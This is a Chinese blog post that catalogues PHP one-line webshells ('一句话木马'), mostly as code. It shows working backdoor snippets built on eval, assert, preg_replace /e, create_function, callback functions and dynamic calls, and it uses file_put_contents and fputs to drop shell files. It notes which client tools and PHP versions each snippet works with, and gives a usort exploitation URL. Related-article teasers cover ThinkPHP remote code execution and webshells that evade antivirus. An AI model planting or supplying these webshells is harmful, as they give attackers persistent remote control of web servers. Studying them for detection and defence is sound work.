php一句话木马连接客户端_代码执行函数之一句话木马

最新推荐文章于 2024-06-22 17:45:00 发布
最新推荐文章于 2024-06-22 17:45:00 发布
阅读量1.5k 收藏
点赞数 1
文章标签: php一句话木马连接客户端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39580042/article/details/111289703
版权
本文由IT新手阿里斯撰写,介绍了PHP中用于构造一句话木马的几个关键函数,包括eval()、assert()、preg_replace()等,详细解释了它们如何执行代码,并提到了file_put_contents()和fputs()等函数在创建木马文件中的作用。内容简洁实用,旨在帮助读者理解PHP代码执行机制。
摘要由CSDN通过智能技术生成

前言

大家好,我是阿里斯,一名IT行业小白。今天分享的内容是代码执行函数之一句话木马的构造。内容简单实用,没有过多的废话,希望能帮助到大家。

函数

eval()

$a = $_POST['cmd1'];eval($a);

38d45ca3867e4b45d98f902055712cec.png

assert()

assert($_REQUEST['a']); #11年的菜刀可以使用 ,其它版本不行# 参考链接 https://www.freebuf.com/articles/web/56616.html

a27750429ee55774dbf22235d0ee3b5d.png

preg_replace()

这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行

preg_replace('/asd/e', $_POST['a'], 'asdfasdg');# 14年的菜刀不行 蚁剑报错  # php5.5后开始弃用/e模式,但是经过测试16的菜刀配合php5.6还可以使用

a5465b8c6b32e89aa88be2216a3c693c.png

create_function()

$func = create_function('', $_POST['cmd']);$func();

bfdaa7ed1820da1af95762deb41e795d.png

call_user_func()

把第一个参数作为回调函数调用,其余参数是回调函数的参数。

call_user_func('assert', $_REQUEST['cmd']);# 经过测试php7.0已失效

4e3bf683e8d90c15f1fe43d2df3ea726.png

call_user_func_array()

调用回调函数,并把一个数组参数作为回调函数的参数

$cmd = $_REQUEST['cmd'];$arr[0] = $cmd;call_user_func_array('assert', $arr);# 7.0 php测试失败

ab7049ed7b369c1e7cbcb53d9b1b38ba.png

array_filter()

第一个参数为数组,第二个参数为回调函数。这个函数的作用就是将array数组中的每个值传递给回调函数做参数。

$cmd = $_REQUEST['cmd'];$arr = array($cmd);$func = $_REQUEST['func'];array_filter($arr, $func);# 经过测试php7.0失效

1ec7f740e8fb64dff928306098333617.png

usort()

函数执行的时候,会依次把$a中的两个值,传递给名字为my_sort函数中,所以你会看到my_sort有两个形参

参考链接http://www.am0s.com/functions/97.html

usort(...$_GET);# php5.6以上7.0以下有效#利用方式#http://127.0.0.1:8999/test/project/code_run.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert#x=phpinfo();

7b4ec5569c36d8dfdbeffe042a500870.png

ef2a626f267aeffa674b9eea1482f96d.png

401232f31ff2eb7e1a98797440469c87.png

file_put_contents()

把一个字符串写入文件中,在浏览器访问这个文件会生成相应的木马文件。

$ma = '<?php eval($_REQUEST[cmd]);?>';#这里一定要使用单引号双引号会把$_REQUEST[]当作变量使用file_put_contents('muma.php', $ma);

fputs()

同上

fputs(fopen('shell.php', 'w'), '<?php eval($_REQUEST[cmd])?>');

动态函数

$_GET['a']($_POST['b']);

af009657b72325685ec3b68fc2a61bd9.png

array_map()

array_map($_GET[func], array($_POST[cmd]));

d09b5a24c7b716624f75424dc9481b69.png


结语

最后啰嗦一句,有收获的朋友欢迎帮忙关注转发一下。

0e67eeddcdacfd4dd3320dca1e7c83b1.png

weixin_39580042
关注
回调函数 ⭐⭐⭐
车明强的博客
10-15 248
函数的参数可以 是任意的数据类型 参数传递对象 function fn(a){ //var a = {uname:"tom"}; console.log(a.uname);//把参数以对象的方式使用 } fn({uname:"tom"}); 参数传递一个数组 function fn(a){ console.log(a[0]); } fn([4,3,5])
rangechecks 检测代码检测到超出范围的数组访问。_Thinkphp 5.0远程代码执行漏洞
weixin_39956350的博客
12-16 731
0x01 简叙本次版本更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。这部分是官网的漏洞通告,官方最开始的补丁是在library/think/route/dispatch/Module.php中添加。但是随机在第二天的5.1.31版本中将这部分的控制移动到...
渗透干货|史上最全一句话木马
最新发布
qkh1234567的博客
06-22 1265
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包。😝有需要的小伙伴,可以点击下方链接免费领取【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析。
thinkphp v5.0.11漏洞_ThinkPHP 5.0.x-5.0.23、5.1.x、5.2.x 全版本远程代码执行漏洞分析
weixin_39522103的博客
12-21 507
阅读:10,1441月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日又接连发布两个更新,这三次更新都修复了一个安全问题,该问题可能导致远程代码执行 ,这是ThinkPHP近期的第二个高危漏洞,两个漏洞均是无需登录即可远程触发,危害极大。0x01 概述1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日又接连发布两个更新,这三次更新都修复了一个安全问...
thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞
weixin_39634579的博客
11-25 233
漏洞介绍ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用影响版本5.0全版本复现环境Vulhub漏洞靶场vulhub-master/thinkphp...
thinkphp v5.0.11漏洞_ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞
weixin_39657444的博客
12-30 513
12月9日,thinkPHP5.*发布了安全更新,这次更新修复了一处严重级别的漏洞,该漏洞可导致(php/系统)代码执行,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。此前没有研究过thinkPHP框架,这次借这个漏洞学习一下。#0x01补丁比对比较5.0.22和5.0.23的差异,关键点在app的module方法。5.0.22://获取控制器名...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2389
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
php冰蝎一句话,利用动态二进制加密实现新型一句话木马PHP篇(转)冰蝎
weixin_32550525的博客
04-05 848
概述本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:利用动态二进制加密实现新型一句话木马之Java篇利用动态二进制加密实现新型一句话木马之.net篇利用动态二进制加密实现新型一句话木马...
php一句话工作原理,一句话木马的工作原理
weixin_31847389的博客
03-24 2150
一句话木马的工作原理:一句话木马分析服务端与客户端。'一句话木马'服务端(是用于本地的html提交脚本木马文件)就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中value可以自己修改'一句话木马'客户端(远程服务器上被插入一句话的asp可执行文件)用来向服务端提交...
一句话木马过狗 php,ASP/PHP一句话木马过安全狗等杀软
weixin_28933797的博客
03-09 1223
站长很辛苦,木马入侵时杀毒软件多数情况并不能起到很好的作用,本博偶尔在入侵过程中会用到的一些过杀软木马,对杀软无力吐槽。虽然我偶尔玩渗透,但是从未搞过无意义的破坏。整理一些常用的PHP、ASP、jsp常用到的一句话木马,部分过安全狗、D盾。看多了之后 自然可以干掉木马……PHP一句话木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$h...
php中fputs写入一句话,phpmyadmin写入一句话木马的测试
weixin_42525387的博客
03-11 914
方法一,一句话木马偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select''INTOOUTFILE'E:\Web\wp-content\errors.php'提示成功了,可是构造地址访问,提示404,看来没成功,应该是转义的问题接着尝试:select''INTOOUTFILE'E:\\Web\\xxx.xx.vn\\wp-content\\error...
thinkphp 一个文件怎么调用另一个文件中的define()_Thinkphp 反序列化利用链深入分析...
weixin_39605521的博客
12-10 140
作者:Ethan@知道创宇404实验室时间:2019年9月21日原文链接:https://paper.seebug.org/1040/前言今年7月份,ThinkPHP 5.1.x爆出来了一个反序列化漏洞。之前没有分析过关于ThinkPHP的反序列化漏洞。今天就探讨一下ThinkPHP的反序列化问题!环境搭建Thinkphp 5.1.35php 7.0.12漏洞挖掘思路在刚接触反序列化漏洞的时候,更...
ThinkPHP V5.0.5漏洞_ThinkPHP5丨远程代码执行漏洞动态分析
weixin_39756192的博客
11-19 1173
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性。但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。那么今天i春秋用动态分析法来介绍远...
php post 漏洞_ThinkPHP 5.0命令执行漏洞分析及复现
weixin_39711441的博客
11-19 409
ThinkPHP 5.0 版本是一个颠覆和重构版本,也是ThinkPHP 十周年献礼版本,基于 PHP5.4 设计(完美支持 PHP7 ),采用全新的架构思想,引入了很多的 PHP 新特性,优化了核心,减少了依赖,支持Composer ,实现了真正的惰性加载,并且为 API 开发做了深入的支持,在功能、性能以及灵活性方面都较为突出 。漏洞描述ThinkPHP5.0在核心代码中实现了表单请...
thinkphp v5.0.11漏洞_ThinkPHP 5.0.x 版本远程代码执行漏洞分析
weixin_30490029的博客
12-30 523
0x01 概述1月11日, ThinkPHP 官方发布新版本5.0.24,修复了一个安全问题,该问题可能导致 GetShell ,这是 ThinkPHP 近期的第二个高危漏洞,两个漏洞均是无需登录即可远程触发,危害极大。0x02 影响版本5.0.x ~ 5.0.230x03 环境搭建选择 5.0.22 版本进行复现分析0x04 漏洞分析我们知道可以通过 http://127.0.0.1/publi...
thinkphp v5.0.11漏洞_ThinkCMFX 漏洞分析集合
weixin_35890416的博客
12-10 717
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本...
thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
weixin_39618169的博客
11-25 194
漏洞描述ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。漏洞环境使用vulhub的环境进行搭建docker-compose up -dhttps://github.com/vulhub/vulhub漏洞复现抓包成功执行命令数据包"...
thinkphp v5.0.11漏洞_ThinkPHP 5.x 远程代码getshell漏洞实战分析
weixin_39700394的博客
12-21 266
ThinkPHP 简介ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,因为其易用性、扩展性,已经成长为国内颇具影响力的WEB应用开发框架漏洞解析漏洞引发的原因是框架对控制器名没有进行足够的检测,现拉取ThinkPHP v5.0.22 来进行测试请求路由=>http://127.0.0.1/public/index.php?s=/index/\think\ap...
thinkphp v5.0.11漏洞_漏洞预警通报【高危】
weixin_42299679的博客
12-21 971
1漏洞标题ThinkPHP5远程代码执行漏洞2漏洞描述ThinkPHP 是一个快速、兼容而且简单的轻量级国产 PHP 开发框架。ThinkPHP 从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。近日,ThinkPHP 官方发布了安全更新,其中修复了存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值